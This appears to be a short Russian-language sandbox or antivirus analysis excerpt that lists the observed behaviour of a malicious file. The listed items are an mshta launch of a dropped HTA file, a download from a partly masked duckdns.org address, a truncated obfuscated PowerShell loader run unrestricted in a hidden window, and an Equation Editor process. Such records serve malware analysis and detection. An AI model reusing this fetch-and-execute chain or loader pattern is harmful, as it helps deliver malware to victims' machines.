Техническая информация
- '%WINDIR%\syswow64\mshta.exe' "%APPDATA%\vbc.hta"
- %APPDATA%\vbc.hta
- http://ma##########frontalldistribute.duckdns.org/084420.hta
- DNS ASK ma##########frontalldistribute.duckdns.org
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted $yfgnhfsg = $Null;function blicoae($nljiqr){return -join($nljiqr-split'(..)'|? L*h|%{[char]+('0x'+$_)})};function blslrjqc($jawwx, $xbjstn){$epfgxo = $env:PUBLIC+(...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding